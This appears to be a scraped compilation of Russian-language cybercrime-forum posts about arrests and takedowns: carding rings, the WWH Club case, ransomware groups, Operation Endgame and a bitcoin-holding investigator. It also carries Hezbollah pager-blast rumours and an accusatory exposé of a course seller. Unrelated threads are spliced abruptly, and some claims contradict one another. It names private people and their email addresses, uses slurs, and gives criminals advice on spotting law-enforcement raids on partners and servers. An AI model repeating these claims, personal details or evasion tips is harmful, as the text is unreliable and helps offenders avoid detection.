Федеральной службой безопасности Российской Федерации во взаимодействии со Следственным департаментом МВД России в 11 субъектах Российской Федерации (Республиках Крым, Северная Осетия-Алания, Калужской, Ленинградской, Московской, Псковской, Самарской и Тамбовской областях, гг. Москве, Санкт- Петербурге и Севастополе) пресечена противоправная деятельность организованной группы лиц, которая специализировалась на продаже краденных данных кредитных и расчетных карт российских и зарубежных финансовых учреждений, полученных в результате неправомерного доступа к учетным записям пользователей сети Интернет и платежных систем.
Членами группы для реализации своего криминального бизнеса создано более 90 интернет-магазинов по продаже похищенных данных, которые впоследствии использовались злоумышленниками для хищения денежных средств с банковских счетов граждан различных государств, в том числе путем приобретения дорогостоящих товаров в сети Интернет.
В ходе обысков по 62 адресам пребывания членов организованной группы изъято более 1 млн. долларов США, 3 млн. рублей, средства компьютерной техники, включая серверное оборудование использовавшееся для функционирования интернет- магазинов, поддельные документы удостоверяющие личность, в том числе паспорта граждан РФ, служебные удостоверения сотрудников правоохранительных органов, использовавшиеся в противоправной деятельности, а также огнестрельное (нарезное) оружие, наркотические средства, золотые слитки и драгоценные монеты.
В результате спецоперации задержаны более тридцати членов группы (включая
граждан Украины и Литвы). Двадцати пяти из них предъявлены обвинения по ч. 2
ст. 187 («Неправомерный оборот средств платежей») УК России и избрана мера
пресечения в виде заключения под стражу.
В результате проведенных мероприятий противоправная деятельность
организованной группы прекращена, используемая в криминальных целях серверная
инфраструктура ликвидирована.
Также было установлено, что организаторы сообщества из числа граждан России ранее привлекались к уголовной ответственности за аналогичные преступления.
PS: Flint'а приняли (Flint24, Алексей Строганов). / GOLDENSHOP /
Все "шопы" под его контролем закрыты.
Полный текст:
The purported leaders of WWH Club, what investigators call a “cross between eBay and Reddit” online criminal forum, were charged in federal court for allegedly running an illicit enterprise helping more than 170,000 users buy stolen bank account numbers, hire hackers, and perform denial of service operations against websites.
The FBI was able to determine the IP addresses of the WWH Club site’s administrators after obtaining a search warrant for the US-based Cloud company Digital Ocean. From there, according to the complaint, computer scientists working for the FBI coded the WWH site’s data to give agents administrative privileges and the ability to see tens of thousands of emails, passwords, and activity registered to accounts. Agents noted that the administrative view of the website was in Russian, requiring them to use Google to translate much of the data.
Pavel Kublitskii, a Russian national, and Alexandr Khodyrev, from Kazakstan, were purportedly listed as administrators and moderators for WWH. The two men reportedly requested asylum two years ago after arriving in the U.S. Now, Kublitskii and Khodyrev face federal charges stemming from their alleged roles in operating the darknet site for conspiracy to traffic and conspiracy to possess 15 or more unauthorized devices.
The FBI says that they learned from gaining administrative access to WWH that the site’s administrators oversaw and reviewed all the transactions that took place on the site in order to “ensure compliance.” Users were reportedly barred from committing crimes in countries that are members of the Commonwealth of Independent States, which includes Kublitskii’s and Khodyrev’s home countries of Russia and Kazakstan, respectively.
The Justice Department declined to comment. A lawyer representing Kublitskii did not immediately respond to a request for comment. It is not clear if Khodyrev was arrested and efforts to reach him were unsuccessful.
Agents said advertisements and banners appeared to users after immediately accessing WWH, which offered access to ‘how to’ guides on credit card fraud, DDoS attacks, and stolen bank accounts for tens of thousands of rubles. WWH administrators also purportedly operated a scheme that recruited and taught users to purchase items with stolen credit card data. **Court records include details of an undercover FBI agent who registered for one of the courses on credit card theft with $1000 in Bitcoin, which he attended for over six weeks alongside fifty other students.
The Bureau says Kublitskii had purchased a luxury condominium in Sunny Isle Beach, Florida. The complaint states that Khodyrev bought a “2023 Corvette at a South Florida dealership with approximately $110,000 cash.”** The affidavit notes that a review of records found that both men appear to be unemployed.
The criminal complaint, which is being reported on first by Court Watch , against the men is sealed in the Middle District of Florida where the U.S. Attorney’s Office there is taking the lead on the case. A copy of the affidavit was unsealed this morning in the South District of Florida where Kublitskii was arrested.
Click to expand...
Источник: https://www.courtwatch.news/p/exclusive-massive-criminal-online
Кратко:
- ФБР выписали ордер на обыск серверов WWH Club , которые почему-то
располагались в американской компании Digital Ocean;
- форум был взломан и ФБР имели полные административные привилегии -
получили доступ к тысячам емэйлов, паролей и полной активности по аккаунтам;
- администраторы и модераторы форума - Павел Кублицкий, гражданин России, и
Александр Ходырев из Казахстана;
- оба администратора форума получили убежище в США два года назад по
прибытию туда;
- в данный момент оба администратора предстали перед судом в обвинении в
управлении даркнет-форумом, конспираси и неавторизованному доступ к более чем
15 устройствам;
- администраторы сайта имели доступ к просмотру всех пользовательских сделок,
была запрещена работа по СНГ;
- судебные документы включают в себя детали как агент ФБР лично
зарегистрировался на одни из курсов "как воровать с кредитных карт" и
оплатил за них биткойнами, участвуя в них на протяжении 6 месяцев с 50 другими
студентами;
- Кублицкий купил роскошное кондо в Флориде, а также корветт 2023 года у
автодилера в Южной Флориде за 110к баксов кэша;
- Кублицкий арестован, по Ходыреву нет данных;
- оба админстратора были все это время официально безработными.
Никнеймы Кублицкого и Ходырева:
54. To date, investigators have determined that the owner and creator of the
forum has two usemames with administrative functions: "W. W.H " and
"Mans77. " In addition to the forum owner and creator, it appears there
are several
other top administrators who operate the site and receive a portion of the
generated revenue. One of those top administrators operates under the usemame
"Makein. " For the reasons described below, there is probable cause to
believe that KUBLITSKII and KHODYREV both serve as administrators of WWH and
share the Makein usemame.
Thus, it appears that both accounts -timion@gmail.com and 2013KPV@gmail.com -were used by KUBLITSKII in connection with the alias of AngelBatista.
Привет другим админам и модерам:
55. On April 29, 2021 , a United States Magistrate Judge sitting in the
MDFL authorized four federal search warrants covering approximately 70 email
accounts associated to administrators and staff who worked together to
facilitate WWH. See 6:21-mj-1332 (TBS); 6:21-mj-1333 (TBS); 6:21-mj-1334
(TBS); 6:21-mj-1335 (TBS). Based on the information gathered from those
warrants, on July 25, 2023 , a different United States Magistrate Judge
sitting in the MDFL authorized four follow-up federal search warrants
covering 25 more email accounts associated with the main WWH Club
administrators. See 8:23-mj-18 (SPF); 8:23-mj-19 (SPF); 8:23-mj-20 (SPF);
8:23-mj-21 (SPF).
Привет всем пользователям гаранта ВВХ и их маркетплейса:
59. Based on a **review of seized backend data pertaining to ************ ,
in or around May 2019, Makein (on **********) sent a message advising a
********** asking the user to send payment for an advertisement to a Bitcoin
address ending in -qN2Z9. Blockchain analysis revealed -qN2Z9, as well as
other Bitcoin addresses provided by Makein on **********, were clustered with
over 100 Bitcoin addresses ("CLUSTER-2"). Between in or around July 10,
2015, and June 22, 2024
CLUSTER-2 received nearly 4,000 individual deposits totaling approximately 152
Bitcoin, or approximately $961,000.
Особое внимание обратите на даты - крайняя - 22 июня 2024!
Судебные документы: https://storage.courtlistener.com/recap/gov.uscourts.flsd.672601/gov.uscourts.flsd.672601.1.0.pdf
Массовые взрывы пейджеров у членов ливанской «Хезболлы» — около 2800 человек по всей стране получили ранения, есть погибшие.
Reuters заявил, что за этим стоят израильские спецслужбы, взломавшие и подорвавшие средства связи, которые были настроены на самоликвидацию для защиты канала.
По данным ливанских СМИ, пейджеры начали детонировать прямо в карманах исламистов по всей стране, многие пострадавшие лишись пальцев и кистей.
Посол Ирана в Ливане заявил о нескольких десятков погибших и 1500 пострадавших
**UPD:
1. *Военный и стратегический эксперт Джозеф Нассар заявил, что произошло
внедрение вируса в программное обеспечение пейджеров добавив, что вирус
произвел перегрузку программного обеспечения что привело к взрыву
аккумулятора.
2. Журналисты Ливана обвинили руководителей Американской университетской
больницы в Бейруте в том, что они могли знать о кибератаке. Несколько дней
назад администрация приказала сотрудникам избавиться от пейджеров.
3. Производитель устройств, которые взорвали членов Хезболлы - всем
известная Motorola: уже известно о 5000 взрывов устройств в Ливане и Сирии.
4. Акции Motorola уже падают в цене, но пока источником информации
является иранский Корпус стражей исламской революции, на которого ссылается
сайт о технологиях Decripto.
5. Моссад заложил в батареи пейджеров химическое вещество PETN, что
привело к их детонации: члены Хезболлы подорвались как минимум из-за трёх
видов пейджеров.
И всё благодаря заложенным в них 20 г вещества PETN (Пентаэритриттетранитрат —
мощное бризантное взрывчатое вещество). При нагревании PETN разлагается с
сильным самоускорением, что часто приводит к взрыву.
Что касается типов «взрывных» пейджеров, СМИ пишут, что это не только Motorola
LX2, но и Teletrim, а также Gold Apollo Rugged Pager AR924.
[skynewsarabia](https://www.skynewsarabia.com/middle- east/1742386-%D9%85%D9%8A%D9%94%D8%A7%D8%AA-%D8%A7%D9%84%D8%AC%D8%B1%D8%AD%D9%89-%D8%A8%D8%B5%D9%81%D9%88%D9%81-%D8%AD%D8%B2%D8%A8-%D8%A7%D9%84%D9%84%D9%87-%D8%A7%D8%AE%D8%AA%D8%B1%D8%A7%D9%82-%D8%A7%D9%94%D9%85%D9%86%D9%8A-%D9%84%D8%A7%D8%B3%D9%84%D9%83%D9%8A)
Министерство юстиции США сегодня объявило о восстановлении «большей части» биткоинов, уплаченных в качестве выкупа оператором трубопроводной системы Colonial Pipeline.
Colonial Pipeline в начале мая подвергся атаке вымогателей, что временно парализовало его работу и повлекло перебои с подачей газа на Восточном побережье. Впоследствии стало известно, что фирма заплатила выкуп в 75 BTC стоимостью около $5 млн по курсу на тот момент. Часть этих средств была отправлена в адрес криптобирж и на даркнет-маркетплейс Hydra для вывода.
Как сообщила заместитель генерального прокурора США Лиза Монако, успешная операция по возврату средств была проведена в понедельник. Она была организована созданной в апреле рабочей группой по цифровому вымогательству.
«После того как Colonial Pipeline быстро уведомил правоохранительные органы и согласно ордеру на конфискацию, выданному судом северного округа Калифорнии сегодня, Министерство юстиции нашло и вернуло большую часть выкупа Colonial, уплаченного сети Dark Side после атаки вымогателей в прошлом месяце», – заявила Монако на пресс-конференции.
Она также обратилась к американским компаниям с предупреждением: «Уделите внимание сейчас. Инвестируйте в ресурсы сейчас. От того, сделаете ли вы это, будет зависеть, окажетесь ли вы в безопасности сейчас или станете жертвой позднее».
Также были опубликованы показания одного из причастных к делу следователей ФБР с дополнительными подробностями операции. Согласно его показаниям, в распоряжении американских властей оказались 63,7 BTC из уплаченной суммы. «Приватный ключ от указанного адреса находится во владении ФБР», – сообщил он. Как именно был получен приватный ключ, в публикации не уточняется. Репортер Reuters Крис Бинг заявляет, что кошелек, предположительно, базировался на компьютерной инфраструктуре в Калифорнии, поэтому ФБР не составило труда получить к нему доступ.
Кроме того, сегодня на пресс-брифинге советник президента по национальной безопасности Джейк Салливан указал на рост опасений американского руководства по поводу программ-вымогателей. По его словам, администрация готовится «запустить план действий, который покроет несколько критических областей», включая «вызовы криптовалют, лежащие в центре этих атак вымогателей».
«Программы-вымогатели являются приоритетом национальной безопасности, особенно в свете атак на критически значимые элементы инфраструктуры Соединенных Штатов, – сказал он, комментируя повестку грядущей встречи G7. – И мы будем позиционировать их соответствующим образом в G7. Мы будем позиционировать их соответствующим образом на каждой остановке этого пути».
Россия готова выдавать киберпреступников США, если будут достигнуты соответствующие двусторонние договоренности и США будут действовать аналогично, заявил президент России Владимир Путин. Ожидается, что вопрос кибербезопасности будет обсуждаться на встрече президентов России и США в Женеве 16 июня.
Я в шоке конечно. Вопрос "что он делал блядь в Швейцарии", учитывая следы сквозь годы и полный деанон, остается витать в воздухе.
https://krebsonsecurity[.]com/wp-content/uploads/2022/11/tank-dj.png
Кребс радостно докладывает:
Vyacheslav “Tank” Penchukov , the accused 40-year-old Ukrainian leader of a prolific cybercriminal group that stole tens of millions of dollars from small to mid-sized businesses in the United States and Europe, has been arrested in Switzerland, according to multiple sources.
Click to expand...
Полная статья с обжевыванием старой информации: https://krebsonsecurity[.]com/2022/11/top-zeus-botnet-suspect-tank-arrested- in-geneva/
Пиздец конечно еще заключается в том, кто в курсе какой темой занимался последнее время Слава.
"Суперадмины дают консультации по ОпСеку-2" или "бесстрашные путешественники"...
Андрей Сидоропуло, он же «Andrey SD» - создатель известной команды «Traffic Deals» по арбитражу трафика (вертикаль «Нутра») через социальную сеть Facebook. Участник и спикер нескольких конференций арбитражной «тусовки». И в тоже время, самая мутная фигура, в плане подтверждения своих реальных успехов, а так же, отзывов его учеников, купивших «авторский» обучающий курс.
Наблюдая за его профилем в Инстаграм (andrey_sd) можно увидеть очень красивую жизнь, покупки роскошных авто (lamborghini huracan, BMW M5, Mercedes S-class) и предметов роскоши, дружбу с известными медийными личностями, и «благородные» поступки - закрытие «маминой» ипотеки (2.5 млн руб), и покупка дорогого авто своему деду (BMW X6M).
P.S. Как выясниться позже, благородные поступки были сделаны на наши деньги.
Но по факту, доказательств его успешной «арбитражной» деятельности, к
сожалению, найти не удается. Информация, которая хоть как то намекает на его
успехи: либо 3х летней давности, либо выданная ИМ САМИМ, без какого либо
подтверждения. Непонятные и беглые наезды камеры телефона на открытый кабинет
партнерки, в котором может разобраться лишь опытный арбитражник (акцент всегда
делался только лишь на СУММУ ВЫПЛАТ). Множество сообщений в Директ его
собственного Instagram, с восхвалением его персоны, ВСЕГДА БЕЗ ССЫЛКИ НА
АВТОРА, и выплаты, которые якобы заработали его ученики. Все вышеперечисленное
является УМЫШЛЕННЫМ ГРЯЗНЫМ ВРАНЬЕМ!!!
В этой группе, МЫ - РЕАЛЬНЫЕ ПОКУПАТЕЛИ его курса, а в последующем «ПОТЕРПЕВШИЕ» по делу против этого «оборотня», покажем вам его настоящее лицо, и расскажем кем на самом деле является Андрей Сидоропуло, и как он достиг такого финансового состояния, ОБМАНУВ БОЛЕЕ 1000+ ЧЕЛОВЕК. А самое главное, МЫ ХОТИМ УБЕРЕЧЬ всех желающих купить его курс по арбитражу трафика, ОТ ЭТОГО КРУПНОМАСШТАБНОГО МОШЕННИКА.

На сегодняшний день, страничка Андрея Сидоропуло в Инстаграм, выглядит как, типичный пример «зазывалы» на привлечение денежных средств. Иначе зачем, успешному, богатому арбитражнику, так активно продавать свои «авторские» знания. Ни один успешный и практикующий арбитражник, не продаст свой опыт и уникальные связки по заливу трафика, потому что «слитые» наработанные схемы в арбитраже, очень быстро перестают быть актуальными, и приносить прибыль.
Но это, мы поняли слишком поздно!
Прямо сейчас, каждый из вас, вспомните, откуда вы узнали об Андрее Сидоропуло!? 90% скажут, что по наводке Михаила Литвина. Ведь буквально, в апреле прошлого 2021 года, его аудитория в Instagram, составляла 1602 человека. После упоминания его в сторис Литвиным, аудитория «зазывалы» резко начала расти вверх, и уже в декабре 2021 года, достигла отметки в 300 тыс. человек. Интересно получается, не правда ли!?
Вот и мы подумали, что Андрей не просто так появился в поле деятельности Литвина.
Кстати о деятельности: Михаил Литвин, уже давно стал «популярным» на просторах
ютуб пространства! О разоблачениях, на его открытые и откровенные схемы
мошеннической работы, можно посмотреть десятки роликов, которые до сих пор,
почему то, остались без внимания правоохранительных органов и не были приняты
в работу.
Но только после того, как мы попались на его удочку (купив курс) и увидели его истинное лицо, потеряв свои кровнозаработанные, мы задались вопросом - зачем, одному из самых известных блогеров России, пиарить никому не известного Андрея Сидоропуло?! А как вам подарок, часы «ROLEX” за миллион рублей… Вы дарили друзьям, часы за миллион?!
Ответ напрашивался сам собой…
Вот и мы подумали, что это некая «взятка», в качестве компенсации за рекламу, что бы накрутить себе немало подписчиков, которые в последующем и станут жертвами в этой мошеннической схеме.
Как выяснилось уже после покупки обучения, команда «Traffic Deals» когда то действительно существовала, но в настоящее время ее деятельность по основному направлению деятельности - арбитражу трафика, практически ликвидированна. Команды больше нет.
Собиралась «Traffic Deals», как позже выяснилось, из ребят, живущих и выросших в одном дворе.
Итак, вот эта команда:
- Андрей Сидоропуло (instagram: andrey_sd) - наш «автор» курса
Тут
все понятно
- Егор Прищенко (telegram @egaqw) - в будущем, главный куратор на нашем курсе в Краснодарском офисе, появившийся в нем от силы раза 3.
- Валерий Богомолов (instagram: @valeriy.god) - в обучении и создании курсов
участия не принимал, но это не точно))) Через месяц после старта продаж нашего
курса, у себя в Instagram запустил «прогревочную» компанию в сторис по
продажам СОБСТВЕННОГО авторского обучения, которое идет по настоящее время.
Структура прогрева в сторис взята, как под копирку, у Андрея Сидоропуло.
-
Некий Жора (telegram @urodz) - в будущем, куратор нашего курса в Московском
офисе. По отзывам, самый «грубый» куратор, который откровенно глумился над
вопросами учеников, пытаясь выставить их идиотами.
- Никита Симко (instagram @etot.samiy) - основной компаньон Сидоропуло, взял на себя всю техническую часть работы в команде «Traffic Deals». В 2020 году покинул команду, и как мы поняли, по словам Андрея, в создании нашего курса он не участвовал. Но в настоящий момент, во время проведения своего прямого эфира в Telegram по теме «арбитража трафика», за вопрос «о причинах ухода из команды, и расхода с Андреем Сидоропуло, просто исключил из конференции.
Команда вела деятельность до 2020 года: участвовала в конференциях, наполняла
социальные сети, в общем, вела социально активный образ жизни. Зарабатывала.
Далее пустота. Провал во времени.
И только побывав в шкуре ученика, купившего курс, пазл полностью сложился.
С 2018 по 2020 год, политика модерации Facebook была намного лояльнее, и запустить трафик мог абсолютно любой новичок, хотя бы немного знающий азы арбитража. Простыми словами, ты сам создаешь аккаунт, просто загружаешь в него рекламную картинку, вставляешь ссылку на товар продавца, и считаешь кол-во лидов, и соответственно прибыль. Золотое время было))
Но лафа кончилась в 2020 году, когда Facebook «закрутил гайки», и большинство
арбитражников сели в лужу, просто не сумев адаптироваться под новые схемы
работы. Сел в лужу и Андрей Сидоропуло, скоропостижно разойдясь со своим
напарником-программистом Никитой Симко.
И единственным путем, по которому смог пойти Сидоропуло - была продажа
информации, которая уже как пару лет устарела, но выдавалась за «приватные
схемы» работы. Ни о какой «авторской» информации и речи быть не может. Вся
информация просто выдрана из интернета, из общедоступных источников. Текста в
обучающих модулях WORDовских документов, даже не отформатированы по смыслу, а
просто выданы в «разнобой». И вся схема работы уже ДАВНО НЕ АКТУАЛЬНА.
Следовательно, заработать в арбитраже, используя данные учебные материалы, не
представляется возможным.
iplj6qaHJWNjjIUNXPGd4g%2FFM1rU3ei8Ak.jpg%3Fsize%3D1280x1272%26quality%3D95%26sign%3D974289aee1b31ef923786a48a5ec2f7b%26type%3Dalbum&hash=d0d7f3b6556999abc6789ea25c13b860)
Этими постами, мы ученики 3го потока обучения Андрея Сидоропуло, хотим предостеречь вас от покупки курсов по «арбитражу трафика» у этого человека. Единственный результат, который вы получите по истечении 3х месяцев - это потерянные деньги и время.
Мы направляли множество досудебных претензий к автору - все остались не удовлетворенными. Этому лицемерному и бесчеловечному оборотню(instagram: andrey_sd), абсолютно все равно, что многие брали эти деньги в кредит, и загнали себя в долговую кабалу перед банками. У многих учеников есть дети, жены в декрете, которые хотели изменить свою жизнь, доверившись, и схватившись за возможность. Он просто плюнул людям в душу.
В настоящее время, мы обратились с коллективным иском в правоохранительные органы, и подготавливаем материал с нашим адвокатом, для обращения в суд.
Параллельно, мы обратились к известному блогеру-юристу @yardrey, с просьбой осветить нашу беду, и постараться защитить от последующего обмана множество людей. Ярдрей, огромное тебе человеческое спасибо.
Вот несколько кратких тезисов по проведенному обучению:
Всего было 4 пакета обучения:
1. «Базовый» - стоимость 29.900 руб
2. «Стандарт» - стоимость 54.900 руб
3. «VIP» - стоимость 119.900 руб
4. «Личное» - стоимость 389.900 руб
Многие могут подумать, что критика от тех, кто купил первые 3 тарифа, может быть не обоснована, ведь ты получаешь только теоретические «базовые» знания, а работаешь уже сам. Безусловно, заработок денег, зависит от того, как ты применишь знания на практике. Но, пакет личного обучения, был обещан с настолько углубленной практикой, где тебя просто «взяв за руку» доведут до гарантированного результата. Однако, этого не произошло - не один ученик, максимального пакета обучения, так же как и всех остальных тарифов - НЕ ЗАРАБОТАЛ НИ КОПЕЙКИ!
- Теперь давайте разберем, как устроен процесс обучения курса Андрея Сидоропуло:
Вся информация выдается в непригодном для понимания виде. В текстовых файлах расположена просто стена текста, в большинстве случаев отсутствуют запятые. Понять общий смысл прочитанного практически не возможно.
- Некоторые модули, выглядят как фотография с монитора, на котором открыта презентация Power Point из 2-3 слайдов (стоимость подобных халтурных модулей автором оценивается от 15 до 30 тыс рублей)
- Всего кураторов было около 10 человек, которые не успевали отвечать в чате такому кол-ву учеников. Из-за этого, ответа приходилось ждать по несколько суток и ответы были максимально не информативны, лишь бы ученик «отстал»
- На личном обучении были предоставлены грязные Б/У столы и стулья, за которыми было просто не приятно сидеть (отношения автора к ученикам было понятно с 1го дня)
- Полностью отсутствовали обещанные домашние задания, с их последующей проверкой
- Автор курса никакого участие в обучении не принимал.
Для понимания, ученики уже имевшие опыт в арбитраже, и пришедшие сюда за повышением навыков, уже на 2й день попросили возврата денежных средств в полном объеме, не потратив ни рубля из бюджета автора. На что им либо было отказано, либо к возврату предлагалась сумма в 1/4 от стоимости тарифа.
Это лишь малая часть того осадка, который получили ученики, купившись на обещания Андрея Сидоропуло. Лично, множество учеников выскажется в ветке отзывов.
Ученикам личного обучения, с первых дней стало понятно, что даже кураторы в офисе имеют лишь маломальский опыт работы в арбитраже, и их практические рекомендации приводят ученика к нулевому результату. На большинство вопросов, о причинах отсутствия результата, кураторы не ответили.
После месяца обучения, началось самое смешное - Андрей обьявил всем ученикам, что с Фейсбуком мы больше не работаем, и полностью переходим на работу в Тиктоке «Вертикали Гэмблинг», хотя всю свою арбитражную деятельность Сидоропуло провел в вертикали «Нутра». Это очень сильно всех удивило, но многие это восприняли как возможность выйти на «хоть какой то» заработок, и стали ждать обучения, ожидание которого затянулось на месяц. В конце января ученикам скинули 10 минутный видео-мануал по работе в тиктоке (который, как выяснилось позже, Сидоропуло купил за 30 тыс рублей, у другой команды). Но итог был один и тот же - НИКТО НЕ ЗАРАБОТАЛ НИ КОПЕЙКИ!
В настоящий момент, Андрей Сидоропуло находится в ОАЭ, скрываясь от встречи с учениками, где уже начал продажи обучения «4го потока»
Стало известно о новом высокопоставленном представители правоохранительного блока, у которого следователи обнаружили миллиардные активы.
Басманный суд Москвы наложил арест на средства в криптовалюте, принадлежащей начальнику СО СКР РФ по Тверскому району Москвы Марату Тамбиеву. Речь идет о свыше 1000 биткоинов, которые стоят на данный момент больше 1 млрд рублей. В один момент стоимость биткоинкопилки следователя составляла свыше 50 млн долл.
Были миллиардер из МВД (Захарченко), миллиардер из ФСБ (Черкалин). Теперь есть миллиардер из СКР.
Согласно документам, оказавшимся в распоряжении издания, Басманный суд наложил арест на 1032 биткоина, находящихся на двух криптокошельках, принадлежащих Тамбиеву. На момент осмотра эквивалент этой суммы в долларах 17,2 млн, а в рублях- 1,042 млрд рублей.
Как мы неоднократно рассказывали, Тамбиев обвиняется в получении взятки от адвоката Романа Мейера, представлявшего интересы лидеров крупной хакерской группировки The Infraud Organization.
Члены хакерской группы The Infraud Organization в момент задержания, на которое лично приезжал Тамбиев, дали доступ к кошелькам с крупной суммой в биткоинах. Все эти деньги оказались выведены с кошельков.
Возглавляемый Тамбиевым отдел и возбудил дело в отношении членов Infraud.
Тамбиев был задержан при получении денег от адвоката участников Infraud.
Напомним, лидерами Infraud являлись Марк Бергман, Константин Бергман, Андрей Новак.
После задержания, у Бергманов стал вымогать деньги их адвокат Роман Мейер, заявлявший, что надо заплатить 1 млн долл и 26 млн рублей для сотрудников МВД, СКР и прокуратуры, чтобы все для участников Infraud закончилось благополучно. Тогда Бергманы обратились в ФСБ РФ и по цепочке задержали Мейера и Тамбиева.
Россия и США намерены вместе сотрудничать для выявления хакеров-вымогателей в рамках соглашений, достигнутых на саммите глав стран Владимира Путина и Джо Байдена. Об этом заявил директор ФСБ Александр Бортников.
Source: https://life.ru/p/1405227
Официальный пресс-релиз: [https://www.europol.europa.eu/media...gainst-
botnets-hits-dropper-malware-ecosystem](https://www.europol.europa.eu/media-
press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-
malware-ecosystem)
Сайт операции: https://operation-endgame.com/ru
Время проведения: с 27 по 29 мая
Итоги:
- 4 ареста (1 в Армении и 3 на Украине)
- 16 обысков (1 в Армении, 1 в Голландии, 3 в Португалии и 11 на Украине)
- более 100 серверов вынесены или приостановлены в Болгарии, Канаде,
Германии, Литве, Голландии, Румынии, Швейцарии, Великобритании, США и на
Украине
- более 2000 доменов перешли под контроль ментов
Основные подозреваемые заработали более 69 миллионов евро в крипто-валюте.
Страны-участники:
EU Member States:
- Denmark: Danish Police (Politi)
- France: National Gendarmerie (Gendarmerie Nationale) and National Police (Police Nationale); Public Prosecutor Office JUNALCO (National Jurisdiction against Organised Crime) Cybercrime Unit; Paris Judicial Police (Préfecture De Police de Paris)
- Germany: Federal Criminal Police Office (Bundeskriminalamt), Prosecutor General's Office Frankfurt am Main – Cyber Crime Center
- Netherlands: National Police (Politie), Public Prosecution Office (Openbaar Ministerie)
Non-EU Member States:
- EU Member States:
- The United Kingdom: National Crime Agency
- The United States: Federal Bureau of Investigation, United States Secret Service, The Defense Criminal Investigative Service, United States Department of Justice
Click to expand...
Координационные центры (термин с сайта Европола, не моя фантазия):
Всем рекомендую проверить партнеров - а не месте ли, и если даже на месте -
а не пропадали ли они с 27 по 29 мая.
Тоже самое касается и ваших серверов - а не лежали ли они с 27 по 29 мая "из-
за проблем с питанием или жестким диском".
Европол обещает новые детали скоро (на сайте тоже красуется модный таймер, как и совсем недавно в другом месте).
P. S. Армяне могут поблагодарить соотечественников за выбор президента- пидораса - Армении даже нет в официальном списке участников операции, но арест был. Подозреваю, кто его осуществлял.
Их подозревают в хищении данных банковских карт у иностранцев.
По версии следствия, несколько ростовчан и рязанец Дмитрий Петровнин познакомились в онлайн-игре. Компания сдружилась и занялась общим бизнесом — воровали данные разных карт для оплаты в интернете и без хозяина. Спросом пользовались американские, немецкие, канадские, французские счета, а вся информация хранилась на серверах в Питере и за границей. Ребята собирались продавать добычу в даркнете, но подельник из Рязани сам передал часть базы (по нашим данным, за 500 долларов), покупатель оказался сотрудником правоохранительных органов. Сейчас Дима под домашним арестом.
Остальных хакеров достаточно жёстко задержали под руководством следователей из Москвы. В суде потом заявили — признавались в том, чего не совершали. Пока неизвестно, была ли вообще возможность воспользоваться украденными данными, но парням светит обвинение в неправомерном обороте средств платежей.
28 сентября в результате скоординированного удара между Национальной жандармерией Франции (Gendarmerie Nationale), Национальной полицией Украины (Національна полиція України) и Федеральным бюро расследований США (ФБР) при координации Европола и Интерпола был арест в Украине двух известных операторов программ-вымогателей, известных своими грабительскими требованиями выкупа (от 5 до 70 миллионов евро).
Итоги дня акции
2 ареста и 7 обысков имущества
Конфискация 375 000 долларов США наличными
Конфискация двух роскошных автомобилей на сумму 217 000 евро
Заморозка активов на $1,3 млн в криптовалютах
Организованную преступную группировку подозревают в совершении с апреля 2020
года серии целенаправленных атак на очень крупные промышленные группы в Европе
и Северной Америке. Преступники будут развертывать вредоносное ПО и красть
конфиденциальные данные этих компаний, прежде чем шифровать свои файлы.
Затем они предлагали ключ дешифрования в обмен на выкуп в размере нескольких миллионов евро, угрожая утечкой украденных данных в даркнет, если их требования не будут выполнены.
Тесное сотрудничество между задействованными правоохранительными органами при поддержке Совместной оперативной группы Европола по борьбе с киберпреступностью (J-CAT) привело к идентификации этих двух лиц в Украине.
Шесть следователей французской жандармерии, четверо ФБР США, прокурор французской прокуратуры Парижа, два специалиста Европейского центра киберпреступности Европола (EC3) и один сотрудник Интерпола были направлены в Украину для совместного проведения следственных мероприятий с Национальной полицией. .
Европол поддержал расследование с самого начала, объединив все вовлеченные страны для разработки совместной стратегии. Его специалисты по киберпреступности организовали 12 координационных совещаний для подготовки к дню действий, а также предоставили аналитическую, вредоносную, криминалистическую и крипто-отслеживающую поддержку. Европол создал виртуальный командный пункт для обеспечения бесперебойной координации между всеми задействованными органами.
В расследовании принимали участие следующие правоохранительные органы:
Франция: Национальный центр киберпреступности Национальной жандармерии (C3N)
Украина: Департамент киберполиции Национальной полиции Украины
США: Полевое отделение Федерального бюро расследований в Атланте.
Европол: Европейский центр киберпреступности (EC3)
ИНТЕРПОЛ: Центр киберобъединения
Эта операция была проведена в рамках Европейской междисциплинарной платформы
против криминальных угроз (EMPACT).
On 28 September, a coordinated strike between the French National Gendarmerie (Gendarmerie Nationale), the Ukrainian National Police (Національна поліція України) and the United States Federal Bureau of Investigation (FBI), with the coordination of Europol and INTERPOL, has led to the arrest in...
www.europol.europa.eu
По данным европейского правоохранительного агентства Europol, они якобы несут
ответственность за 5000 заражений, что составляет 500000 евро в виде выкупа.
REvil одна из самых известных группировок рансома в 2021 году , ответствена за
сотни громких атак по всему миру.
В тот же день власти Кувейта арестовали еще одного подозреваемого в связях с
GandGrab.
В дополнение к этим арестам в ходе операции GoldDust в феврале, апреле и 2021 году властями Южной Кореи были арестованы еще три аффилированных лица, связанных с программой- вымогателем REvil . Другой филиал был арестован в Европе в октябре. Всего в результате операции было арестовано семь человек, и это первый случай, когда они были раскрыты правоохранительными органами публично.
В операции приняли участие полиция из разных стран мира и международные
правоохранительные органы Европол, Евроюст и Интерпол. Аресты последовали за
совместной операцией по выявлению перехвата сообщений и захвату
инфраструктуры, используемой во время кампаний.
Операция GoldDust также получила поддержку со стороны индустрии
кибербезопасности от таких компаний, как Bitdefender, KPN и McAfee.
Исследователи Bitdefender предоставили техническую информацию на протяжении
всего расследования, а также инструменты дешифрования, чтобы помочь жертвам
атак рансома восстановить свои файлы без необходимости платить выкуп.
Инструменты дешифрования для нескольких версий вымогателей GandCrab и REvil доступны бесплатно через проект No More Ransom . По данным Европола, инструменты дешифрования REvil помогли более чем 1400 компаниям расшифровать свои сети после рансом атаки, сэкономив более 475 миллионов евро (550 миллионов долларов) на выплатах киберпреступникам.
Европол поддержал операцию, предоставив аналитическую поддержку, а также анализ вредоносных программ и криптовалюты. В операции GoldDust участвуют 17 стран: Австралия, Бельгия, Канада, Франция, Германия, Нидерланды, Люксембург, Норвегия, Филиппины, Польша, Румыния, Южная Корея, Швеция, Швейцария, Кувейт, Великобритания и США.
Аресты стали последними в череде операций правоохранительных органов, направленных на операции с борьбой рансом-кибератак. В прошлом месяце операция под руководством Европола была направлена против 12 подозреваемых на Украине и Швейцарии, предположительно тех стоящих за LockerGoga, MegaCortex, Dharma и другим рансом атак. Также недавно сообщалось, что правоохранительные органы из разных стран помогли устранить ключевые элементы REvil.

